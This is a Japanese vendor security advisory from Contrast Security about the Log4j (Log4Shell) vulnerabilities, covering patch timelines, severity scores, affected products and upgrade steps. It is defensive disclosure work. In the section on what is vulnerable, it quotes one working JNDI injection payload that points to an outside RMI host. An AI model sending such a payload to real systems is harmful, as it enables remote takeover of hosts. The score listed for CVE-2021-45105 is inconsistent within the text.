最初の投稿:2021年12月10日 (記事内は全て米国東部時間)
このページは頻繁に更新されます。最新の記事の更新については、タイトル下の日付/時間(GMT)をご覧ください。
- 何が起こったか?具体的な影響は?
- どのような脆弱性なのか?
- なぜ問題なのか?
- 脆弱な可能性は?
- どのくらい深刻か?
- Contrast Securityとどう関連し、影響があるお客様は?
- Contrastのお客様がこの脆弱性の有無を判断するには?
- Contrastのお客様は何をすべきか?
- 関連記事
何が起こったか?具体的な影響は?
Java用のオープンソースライブラリである「Log4J」ゼロディ脆弱性が、米国東部時間(EST)の2021年12月9日午前9時30分に公表され、現在CVE-2021-44228として公表されています。
この脆弱性は、Contrastをご利用の全てのお客様に影響します。Contrast SecurityのアプリケーションでSaaS版およびオンプレミス版(EOP)の両方において、この脆弱性のあるライブラリが使用されていることを確認しましたが、現時点で侵入された形跡などは無いことを確認済みです。
- 2021年12月9日22時15分(EST)時点で、ContrastのSaaS版アプリケーションにLog4j 2.15を適用済み
- 2021年12月14日15時37分(EST)、全てのSaaS版アプリケーションにLog4j 2.16を適用
- 2021年12月18日11時36分(EST)、全てのSaaS版アプリケーションにLog4j 2.17を適用
- 2021年12月18日12時18分(EST)、Log4j 2.17を適用したEOP版をリリース
Log4j 2.17へのアップグレードにより、以下に対応しております:
オンプレミス版をご利用のお客様は、Contrastでは、Log4j 2.17を適用済みのバージョンをリリースしておりますので、全てのお客様がこのバージョンにアップグレードすることを推奨します。
注意:ここでは、Contrast Securityのソフトウェアの影響についてをお知らせしていますが、お客様のJavaアプリケーションも影響を受けている可能性が非常に高いです。速やかにアプリケーションに対してアップグレード/アップデートなど、対策を講じてください。ContrastのProtectは、公開されているPoC(実証コード)も含め、ほとんどの攻撃ベクトルに対してアプリケーションを保護することができます。
どのような脆弱性なのか?
CVE-2021-44228 - NVD(National Vulnerability Database)の情報はこちらをご覧ください。
なぜ問題なのか?
問題のライブラリは、多くのJavaアプリケーションで広く使用されています。弊社では、このCVEが非常に広範囲な影響を与え、大多数のJavaアプリケーションに影響があると考えています。
このライブラリが、Contrast Securityの製品でも使用されていることを確認しています(詳細は後述)。
脆弱な可能性は?
Log4jを使用して、攻撃者が制御するあらゆる情報(HTTPヘッダ、URI、パラメータ、Cookieなど)を記録するアプリケーションは脆弱と言えます。攻略は非常に簡単で、簡単に自動化することができます。 例えば、1つのHTTPリクエストで${jndi:rmi://192.168.1.31:1099/9tmpja}”
を送信するだけで、アプリケーションのホストを完全に制御できます。お客様のシステムがインターネット経由でアクセス可能な場合は、特にリスクが高くなります。自動化された攻撃が広範囲になる可能性があります。Contrast研究所では、悪用可能であることを明らかにしています。
今後も検証作業は継続し、進捗状況をお知らせします。
どのくらい深刻か?
本件に関するCVEは、現時点ではNIST(米国国立標準技術研究所)が精査中ですが、NISTは最初のCVSSスコアを設定しています。しかし、ASF(Apacheソフトウェア財団)は、スコアの更新を続けています。 弊社内の専門家はASFのスコアに同意し、これらの更新を反映するために当社のCVEスコアを更新しました。
CVE-2021-44228 - CVSS 10.0
- NVD(National Vulnerability Database)の情報はこちらを参照
- ASF(Apacheソフトウェア財団)は、このCVEをCVSS10.0と判定(詳細はこちら)
- バージョン2.15で修正
CVE-2021-45046 - CVSS 9.0
- NVD(National Vulnerability Database)の情報はこちらを参照
- ASF(Apacheソフトウェア財団)は、このCVEをCVSS9.0と判定(詳細はこちら)
- バージョン2.16で修正
CVE-2021-45105 - CVSS 7.5
- NVD(National Vulnerability Database)の情報はこちらを参照
- ASF(Apacheソフトウェア財団)は、このCVEをCVSS9.0と判定(詳細はこちら)
- バージョン2.17で修正
Contrast Securityにどう関連し、影響があるお客様は?
ContrastのSaaS版をご利用のお客様は、この脆弱性が悪用されていた場合に影響があった可能性がありますが、今までのところ侵入の形跡は検出されていません。なお、弊社は全てのSaaS版システムにパッチを適用済みです。
ContrastのEOP版をご利用のお客様で、Web経由でシステムにアクセス可能な場合は、直ちにパッチを適用してください。パッチが適用されたEOPバージョンがリリースされていますので、全てのお客様が早急にアップグレードすることを推奨します。
Contrast Javaエージェントへの影響はありません。Contrast Security製品がJava 6、Java 7、JBossのような旧テクノロジやフレームワークを使用するアプリケーションをサポートするために、Javaエージェントは古いバージョンのlog 4 jを使用しています。 弊社では、Log4j 1.xの使用は許できるリスクであると判断しています。しかし、弊社ではLog4j 1.xに依存しないJavaエージェントの新しいバージョンをリリースすることを検討していますが、前述の旧フレームワークをサポートしない可能性があります。
製品 |
影響 |
防御 |
パッチ適用 |
SaaS版(ホスト型)の環境(全て) |
あり |
あり Contrast Protectが有効 |
適用済み
|
オンプレミス(EOP)版の環境 |
あり |
なし |
適用済み
|
Javaエージェント |
なし |
N/A |
N/A |
Contrast Scan |
あり |
あり Contrast Protectが有効 |
適用済み
|
Contrastのお客様がこの脆弱性の有無を判断するには?
Contrast EOPサーバの全てのバージョンで3.8.10.1566200307より前のバージョンに、このゼロディの脆弱性があります。さらに、ASFの勧告に従って、3.8.10.1589286247をリリースし、Log4jのバージョン2.16に更新して、 CVE-2021-45046へ対する防御を追加しています。 追加リリースの3.8.10.1596449597では、Log4jのバージョン2.17に更新して、CVE-2021-45105へ対する防御を追加しています。
Contrastのお客様は何をすべきか?
オンプレミス版(EOP)をご利用のお客様は、Contrast HUB(こちら)より最新のパッチ適用済みバージョン(3.8.10.1596449597以降)にアップグレードすることを推奨します。標準的なアップグレード手順(こちら)に従ってください。
お客様のJavaアプリケーションのポートフォリオについては、アプリケーション内の脆弱なライブラリを検索し、早急にパッチを適用したライブラリに更新する必要があります。Contrast研究所では、Contrast Assessでこの脆弱性が脆弱なコードパスにおける「ログインジェクション」として識別されることも確認済みです。また、Contrast SCAは、この脆弱なライブラリを識別します。全ての脆弱なJavaアプリケーションに対して推奨される修正方法をブログで公開しています: https://www.contrastsecurity.com/security-influencers/0-day-detection-of-log4j2-vulnerability
何かご質問や不明な点がございましたら、support@contrastsecurity.comまでご連絡くださいますようお願いします。